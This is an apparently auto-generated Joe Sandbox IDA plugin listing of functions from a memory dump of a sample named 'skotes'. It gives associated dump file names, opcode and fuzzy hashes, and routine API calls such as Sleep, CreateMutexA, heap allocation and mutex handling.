Source File: 00000007.00000002.2396944563.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000007.00000002.2396880013.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2396944563.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397123846.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397331895.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397514180.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397947916.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397988014.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398032734.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398032734.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398142893.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398190826.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398231809.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398277697.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398321382.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398363512.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398404782.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398447127.00000000009AD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398495440.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398543218.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398622879.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398662924.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398702660.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398740514.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398777283.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398820809.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398861976.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398906103.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398946612.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398989055.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399029067.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399053614.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399111594.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399154613.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399154613.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399257971.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399291114.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399334195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399370416.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399423576.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2~
API String ID: 1464230837-3459864372
Opcode ID: 0c440f2c86f4aa3d6b06a0b8c73ab69ec7ccd5b155254b1c5178447f1251d4fe
Instruction ID: 8247c7af08b37805cce49dd9aa76d2a3210f61bac2dcb1587db21e37f1e2389b
Opcode Fuzzy Hash: 0c440f2c86f4aa3d6b06a0b8c73ab69ec7ccd5b155254b1c5178447f1251d4fe
Instruction Fuzzy Hash: 822128713C9200EAFB2977A89C9EB6DB3629F91300F244817E148D72D1DA7E99808373

Function 0078A34F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0078A963
CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981

Strings

T2~, xrefs: 0078A970

Memory Dump Source

Source File: 00000007.00000002.2396944563.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000007.00000002.2396880013.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2396944563.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397123846.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397331895.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397514180.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397947916.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397988014.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398032734.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398032734.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398142893.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398190826.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398231809.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398277697.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398321382.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398363512.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398404782.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398447127.00000000009AD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398495440.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398543218.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398622879.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398662924.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398702660.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398740514.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398777283.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398820809.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398861976.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398906103.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398946612.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398989055.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399029067.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399053614.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399111594.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399154613.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399154613.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399257971.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399291114.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399334195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399370416.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399423576.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2~
API String ID: 1464230837-3459864372
Opcode ID: d2e2c0e0977fe0d05d213e1a4b8cbee0770fe03664116eb0053eb45680d307f0
Instruction ID: b57475d5aacb162ccdc195649d82413d6a8181efcfac82a1a6fcc039a88236b7
Opcode Fuzzy Hash: d2e2c0e0977fe0d05d213e1a4b8cbee0770fe03664116eb0053eb45680d307f0
Instruction Fuzzy Hash: 83217931788200EBFB18BB68EC8D76CB762EBD5310F20421EE408D76D1DB3D69808312

Function 007BD82F Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,007BA813,00000001,00000364,00000006,000000FF,?,007BEE3F,?,00000004,00000000,?,?), ref: 007BD871

Memory Dump Source

Source File: 00000007.00000002.2396944563.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000007.00000002.2396880013.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2396944563.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397123846.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397331895.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397514180.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397947916.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397988014.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398032734.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398032734.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398142893.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398190826.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398231809.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398277697.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398321382.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398363512.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398404782.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398447127.00000000009AD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398495440.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398543218.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398622879.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398662924.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398702660.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398740514.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398777283.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398820809.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398861976.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398906103.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398946612.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398989055.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399029067.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399053614.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399111594.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399154613.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399154613.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399257971.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399291114.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399334195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399370416.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399423576.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: eb1ad95529a0eaecbc4e43656673cc1dcd73c29542d09df88981ef728d061fe0
Instruction ID: 6c8a2c4b5e7bd3ca1a6b207cadca37090325e5e375dfa8dcd093f8c4582437b1
Opcode Fuzzy Hash: eb1ad95529a0eaecbc4e43656673cc1dcd73c29542d09df88981ef728d061fe0
Instruction Fuzzy Hash: 11F02732601224A6EB312A769C09BDB3759DF857B2B188021FD08EB181FB3CEC0086E0

Non-executed Functions

Function 007BCBDF Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 007BCC66

Strings

v{, xrefs: 007BCBE1

Memory Dump Source

Source File: 00000007.00000002.2396944563.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000007.00000002.2396880013.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2396944563.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397123846.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397331895.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397514180.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397947916.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397988014.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398032734.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398032734.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398142893.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398190826.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398231809.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398277697.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398321382.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398363512.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398404782.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398447127.00000000009AD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398495440.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398543218.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398622879.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398662924.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398702660.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398740514.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398777283.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398820809.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398861976.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398906103.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398946612.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398989055.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399029067.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399053614.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399111594.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399154613.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399154613.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399257971.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399291114.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399334195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399370416.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399423576.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID: v{
API String ID: 3213747228-1518592600
Opcode ID: ff3b895da8359e455593cab76a85431316fff6c614e69054163c5cc9de6e39d3
Instruction ID: 77ac5c4256ab6070df1f60937f3493894eb0182b6ea6c90476419967f83aec47
Opcode Fuzzy Hash: ff3b895da8359e455593cab76a85431316fff6c614e69054163c5cc9de6e39d3
Instruction Fuzzy Hash: D7B10532A04686DFDB16CF28C885BEEBFE5EF55350F14816AE855EB242D6389D01CB60

Function 00782EC0 Relevance: 7.8, APIs: 5, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00782F5F
__Mtx_unlock.LIBCPMT ref: 00782FCC
__Cnd_broadcast.LIBCPMT ref: 00782FE3
__Mtx_unlock.LIBCPMT ref: 007830F5
__Mtx_unlock.LIBCPMT ref: 0078319B

Memory Dump Source

Source File: 00000007.00000002.2396944563.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000007.00000002.2396880013.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2396944563.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397123846.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397331895.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397514180.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397947916.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397988014.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398032734.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398032734.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398142893.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398190826.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398231809.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398277697.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398321382.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398363512.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398404782.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398447127.00000000009AD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398495440.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398543218.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398622879.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398662924.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398702660.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398740514.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398777283.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398820809.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398861976.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398906103.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398946612.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398989055.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399029067.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399053614.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399111594.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399154613.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399154613.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399257971.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399291114.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399334195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399370416.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399423576.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: 5c3d65db8751ba17445fcb1787d165ded7d679a84cf395d7f5a8d2003cfae295
Instruction ID: ff67522a08937435a8a55695b149d02fc572c86e0c9c8ba664eee9b9bf842f70
Opcode Fuzzy Hash: 5c3d65db8751ba17445fcb1787d165ded7d679a84cf395d7f5a8d2003cfae295
Instruction Fuzzy Hash: 4AA104B0A41609DFDF11EF68D948B5AB7B8FF14B20F048129E815D7241EB39EA05CBD1

Function 0079BB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0079BBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 0079BBE4
_xtime_get.LIBCPMT ref: 0079BC07
__Xtime_diff_to_millis2.LIBCPMT ref: 0079BC13

Memory Dump Source

Source File: 00000007.00000002.2396944563.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000007.00000002.2396880013.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2396944563.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397123846.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397331895.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397514180.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397947916.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2397988014.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398032734.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398032734.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398142893.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398190826.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398231809.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398277697.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398321382.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398363512.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398404782.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398447127.00000000009AD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398495440.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398543218.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398622879.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398662924.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398702660.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398740514.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398777283.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398820809.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398861976.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398906103.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398946612.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2398989055.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399029067.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399053614.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399111594.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399154613.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399154613.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399257971.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399291114.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399334195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399370416.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2399423576.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 1d1671a99f061aa4e79fa56e415a2d43dfbd4e8e63dab465840c66a8ba2240e3
Instruction ID: 0353687fc318050c3c4c9c49816dd2f58225c7543bd1bafa4354c0ae6a7fb851
Opcode Fuzzy Hash: 1d1671a99f061aa4e79fa56e415a2d43dfbd4e8e63dab465840c66a8ba2240e3
Instruction Fuzzy Hash: F1213272A01119EFDF01EFA4ED859BEB7B9EF09710F104015F501B7291DB38AD019BA0

